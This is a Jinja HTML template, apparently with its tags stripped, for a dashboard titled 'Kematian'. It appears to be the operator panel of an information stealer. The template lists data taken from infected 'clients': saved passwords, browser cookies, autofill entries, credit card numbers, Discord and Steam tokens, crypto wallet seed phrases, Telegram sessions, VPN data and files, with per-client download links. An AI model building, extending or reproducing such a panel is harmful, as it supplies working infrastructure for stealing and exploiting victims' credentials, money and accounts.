{% extends "base.html" %} {% block title %}{{ title }} · Kematian{% endblock %} {% block content %}

{{ label }}

{{ title }} · {{ rows|length }} total{% if client_filter %} · clear filter{% endif %}

{% if client_filter and key in ['wallets','telegram','gaming','files','keys'] %}

→ download hosted files for this client

{% endif %}
{% if key in ['passwords','cookies','autofill','credit_cards','discord_tokens','app_credentials','seeds','steam_tokens'] %} {% endif %} Raw JSON
{% if key == 'passwords' %}{% endif %} {% if key == 'cookies' %}{% endif %} {% if key == 'autofill' %}{% endif %} {% if key == 'history' %}{% endif %} {% if key == 'bookmarks' %}{% endif %} {% if key == 'credit_cards' %}{% endif %} {% if key == 'discord_tokens' %}{% endif %} {% if key == 'files' %}{% endif %} {% if key == 'extensions' %}{% endif %} {% if key == 'wallets' %}{% endif %} {% if key == 'telegram' %}{% endif %} {% if key == 'keys' %}{% endif %} {% if key in ['wallets','telegram','gaming'] %}{% endif %} {% if key == 'app_credentials' %}{% endif %} {% if key == 'seeds' %}{% endif %} {% if key == 'gaming' %}{% endif %} {% if key == 'steam_tokens' %}{% endif %} {% if key == 'vpns' %}{% endif %} {% for r in rows %} {% if key == 'passwords' %} {% endif %} {% if key == 'cookies' %} {% endif %} {% if key == 'autofill' %} {% endif %} {% if key == 'history' %} {% endif %} {% if key == 'bookmarks' %} {% endif %} {% if key == 'credit_cards' %} {% endif %} {% if key == 'discord_tokens' %} {% endif %} {% if key == 'files' %} {% endif %} {% if key == 'extensions' %} {% endif %} {% if key == 'wallets' %} {% endif %} {% if key == 'telegram' %} {% endif %} {% if key == 'keys' %} {% endif %} {% if key in ['wallets','telegram','gaming'] %} {% endif %} {% if key == 'app_credentials' %} {% endif %} {% if key == 'seeds' %} {% endif %} {% if key == 'gaming' %} {% endif %} {% if key == 'steam_tokens' %} {% endif %} {% if key == 'vpns' %} {% endif %} {% else %} {% endfor %}
URLUsernamePasswordBrowserHostNameValueBrowserFieldValueBrowserURLTitleVisitsLast visitNameURLTypeCardHolderExpBrowserTokenSourceNameSizePathNameVersionBrowserIDNameTypeSizeAddressesAccountFilesSizePathTypeNameSizePathFilesAppHostUsernamePasswordPhraseSourceWordsPlatformDataSteam IDTokenVPNDataClient
{{ r['url'] or '' }} {{ r['username'] or '' }} {{ r['password'] or '' }} {{ r['browser'] or '' }}{{ r['host'] or '' }} {{ r['name'] or '' }} {{ r['value'] or '' }} {{ r['browser'] or '' }}{{ r['name'] or '' }} {{ r['value'] or '' }} {{ r['browser'] or '' }}{{ r['url'] or '' }} {{ r['title'] or '' }} {{ r['visit_count'] or 0 }} {{ (r['last_visit_time'] | datetime) if r['last_visit_time'] else '—' }}{{ r['name'] or '' }} {{ r['url'] or '' }} {{ r['type'] or '' }}{{ r['card_number'] or '' }} {{ r['name_on_card'] or '' }} {{ r['expiration_month'] or '?' }}/{{ r['expiration_year'] or '?' }} {{ r['browser'] or '' }}{{ r['token'] or '' }} {{ r['source'] or '' }}{{ r['name'] or '' }} {{ (r['size'] | filesize) }} {{ r['path'] or '' }}{{ r['name'] or '' }} {{ r['version'] or '' }} {{ r['browser'] or '' }} {{ r['ext_id'] or '' }}{{ r['name'] or '' }} {{ r['type'] or '' }} {{ (r['size'] | filesize) }} {{ r['addresses'] or '' }}{{ r['account'] or '' }} {{ r['files'] or 0 }} {{ (r['size'] | filesize) }} {{ r['path'] or '' }}{{ r['type'] or '' }} {{ r['name'] or '' }} {{ (r['size'] | filesize) }} {{ r['path'] or '' }}Download{{ r['application'] or '' }} {{ r['host'] or '' }} {{ r['username'] or '' }} {{ r['password'] or '' }}{{ r['phrase'] or '' }} {{ r['source'] or '' }} {{ r['words'] or 0 }}{{ r['platform'] or '' }} {{ (r['payload'] or '')[:60] }}{% if r['payload'] and r['payload']|length > 60 %}…{% endif %}{{ r['steam_id'] or '' }} {{ r['token'] or '' }}{{ r['vpn'] or '' }} {{ (r['payload'] or '')[:60] }}{% if r['payload'] and r['payload']|length > 60 %}…{% endif %}{{ r.client_id }}
No {{ label|lower }} yet.
{% endblock %}